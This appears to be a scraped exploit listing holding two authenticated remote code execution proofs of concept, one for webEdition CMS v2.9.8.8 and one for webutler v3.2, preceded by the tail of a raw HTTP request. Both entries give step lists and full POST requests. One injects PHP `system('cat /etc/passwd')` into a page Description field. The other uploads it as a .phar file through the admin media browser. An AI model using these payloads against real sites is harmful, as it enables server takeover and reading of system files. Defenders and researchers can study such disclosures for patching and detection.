/webEdition/we_cmd.php?we_cmd[0]=save_document&we_cmd[1]=&we_cmd[2]=&we_cmd[3]=&we_cmd[4]=&we_cmd[5]=&we_cmd[6]= HTTP/1.1<br />Host: localhost<br />Content-Length: 761<br />Cache-Control: max-age=0<br />sec-ch-ua: <br />sec-ch-ua-mobile: ?0<br />sec-ch-ua-platform: ""<br />Upgrade-Insecure-Requests: 1<br />Origin: http://localhost<br />Content-Type: application/x-www-form-urlencoded<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-User: ?1<br />Sec-Fetch-Dest: iframe<br />Referer: 
http://localhost/webEdition/we_cmd.php?we_cmd[0]=switch_edit_page&we_cmd[1]=0&we_cmd[2]=73fee01822cc1e1b9ae2d7974583bb8e<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Cookie: treewidth_main=300; WESESSION=e781790f1d79ddaf9e3a0a4eb42e55b04496a569; cookie=yep; treewidth_main=300<br />Connection: close<br /><br />we_transaction=73fee01822cc1e1b9ae2d7974583bb8e&we_cea6f7e60ce62be78e59f849855d2038_Filename=malas&we_cea6f7e60ce62be78e59f849855d2038_Extension=.svg&wetmp_we_cea6f7e60ce62be78e59f849855d2038_Extension=&we_cea6f7e60ce62be78e59f849855d2038_ParentPath=%2F&we_cea6f7e60ce62be78e59f849855d2038_ParentID=0&yuiAcContentTypeParentPath=&we_cea6f7e60ce62be78e59f849855d2038_IsSearchable=1&check_we_cea6f7e60ce62be78e59f849855d2038_IsSearchable=1&we_cea6f7e60ce62be78e59f849855d2038_IsProtected=0&fold%5B0%5D=0&fold_named%5BPropertyPage_2%5D=0&fold%5B1%5D=0&fold_named%5BPropertyPage_3%5D=0&wetmp_cea6f7e60ce62be78e59f849855d2038_CreatorID=%2Fadmin&we_cea6f7e60ce62be78e59f849855d2038_CreatorID=1&we_cea6f7e60ce62be78e59f849855d2038_RestrictOwners=0&we_complete_request=1<br /><br /></code></pre>
<pre><code>Exploit Title: Webedition CMS v2.9.8.8 - Remote Code Execution (RCE)<br />Application: webedition Cms<br />Version: v2.9.8.8 <br />Bugs: RCE<br />Technology: PHP<br />Vendor URL: https://www.webedition.org/<br />Software Link: https://download.webedition.org/releases/OnlineInstaller.tgz?p=1<br />Date of found: 03.08.2023<br />Author: Mirabbas Ağalarov<br />Tested on: Linux <br /><br /><br />2. Technical Details & POC<br />========================================<br />steps<br />1. Login account<br />2. Go to New -> Webedition page -> empty page<br />3. Select php<br />4. Set as "><?php echo system("cat /etc/passwd");?> Description area<br /><br />Poc request: <br /><br />POST /webEdition/we_cmd.php?we_cmd[0]=switch_edit_page&we_cmd[1]=0&we_cmd[2]=4fd880c06df5a590754ce5b8738cd0dd HTTP/1.1<br />Host: localhost<br />Content-Length: 1621<br />Cache-Control: max-age=0<br />sec-ch-ua: <br />sec-ch-ua-mobile: ?0<br />sec-ch-ua-platform: ""<br />Upgrade-Insecure-Requests: 1<br />Origin: http://localhost<br />Content-Type: application/x-www-form-urlencoded<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-User: ?1<br />Sec-Fetch-Dest: iframe<br />Referer: http://localhost/webEdition/we_cmd.php?we_cmd[0]=switch_edit_page&we_cmd[1]=0&we_cmd[2]=4fd880c06df5a590754ce5b8738cd0dd<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Cookie: treewidth_main=300; WESESSION=e781790f1d79ddaf9e3a0a4eb42e55b04496a569; cookie=yep; treewidth_main=300<br />Connection: close<br /><br 
/>we_transaction=4fd880c06df5a590754ce5b8738cd0dd&we_003be033b474a5c25132d388906fb4ae_Filename=poc&we_003be033b474a5c25132d388906fb4ae_Extension=.php&wetmp_we_003be033b474a5c25132d388906fb4ae_Extension=&we_003be033b474a5c25132d388906fb4ae_ParentPath=%2F&we_003be033b474a5c25132d388906fb4ae_ParentID=0&yuiAcContentTypeParentPath=&we_003be033b474a5c25132d388906fb4ae_DocType=&we_003be033b474a5c25132d388906fb4ae_TemplateName=%2F&we_003be033b474a5c25132d388906fb4ae_TemplateID=&yuiAcContentTypeTemplate=&we_003be033b474a5c25132d388906fb4ae_IsDynamic=0&we_003be033b474a5c25132d388906fb4ae_IsSearchable=0&we_003be033b474a5c25132d388906fb4ae_InGlossar=0&we_003be033b474a5c25132d388906fb4ae_txt%5BTitle%5D=asdf&we_003be033b474a5c25132d388906fb4ae_txt%5BDescription%5D=%22%3E%3C%3Fphp+echo+system%28%22cat+%2Fetc%2Fpasswd%22%29%3B%3F%3E&we_003be033b474a5c25132d388906fb4ae_txt%5BKeywords%5D=asdf&fold%5B0%5D=0&fold_named%5BPropertyPage_3%5D=0&we_003be033b474a5c25132d388906fb4ae_Language=en_GB&we_003be033b474a5c25132d388906fb4ae_LanguageDocName%5Bde_DE%5D=&we_003be033b474a5c25132d388906fb4ae_LanguageDocID%5Bde_DE%5D=&yuiAcContentTypeLanguageDocdeDE=&we_003be033b474a5c25132d388906fb4ae_LanguageDocName%5Ben_GB%5D=&we_003be033b474a5c25132d388906fb4ae_LanguageDocID%5Ben_GB%5D=&yuiAcContentTypeLanguageDocenGB=&fold%5B1%5D=0&fold_named%5BPropertyPage_4%5D=0&we_003be033b474a5c25132d388906fb4ae_CopyID=0&fold%5B2%5D=0&fold_named%5BPropertyPage_6%5D=0&wetmp_003be033b474a5c25132d388906fb4ae_CreatorID=%2Fadmin&we_003be033b474a5c25132d388906fb4ae_CreatorID=1&we_003be033b474a5c25132d388906fb4ae_RestrictOwners=0&we_complete_request=1<br /><br /></code></pre>
<pre><code>Exploit Title: Webutler v3.2 - Remote Code Execution (RCE)<br />Application: webutler Cms<br />Version: v3.2<br />Bugs: RCE<br />Technology: PHP<br />Vendor URL: https://webutler.de/en<br />Software Link: http://webutler.de/download/webutler_v3.2.zip<br />Date found: 03.08.2023<br />Author: Mirabbas Ağalarov<br />Tested on: Linux <br /><br /><br />2. Technical Details & POC<br />========================================<br />Steps: <br />1. Log in to an account as admin<br />2. Go to Media <br />3. Upload a .phar file<br />4. Upload the poc.phar file<br /><br />poc.phar file contents :<br /><?php echo system("cat /etc/passwd");?><br />5. Visit the poc.phar file<br />PoC request:<br /><br />POST /webutler_v3.2/admin/browser/index.php?upload=newfile&types=file&actualfolder=%2F&filename=poc.phar&overwrite=true HTTP/1.1<br />Host: localhost<br />Content-Length: 40<br />sec-ch-ua: <br />sec-ch-ua-mobile: ?0<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36<br />X_FILENAME: poc.phar<br />sec-ch-ua-platform: ""<br />Accept: */*<br />Origin: http://localhost<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: cors<br />Sec-Fetch-Dest: empty<br />Referer: http://localhost/webutler_v3.2/admin/browser/index.php<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Cookie: WEBUTLER=ekgfsfhi3ocqdvv7ukqoropolu<br />Connection: close<br /><br /><?php echo system("cat /etc/passwd");?><br /><br /></code></pre>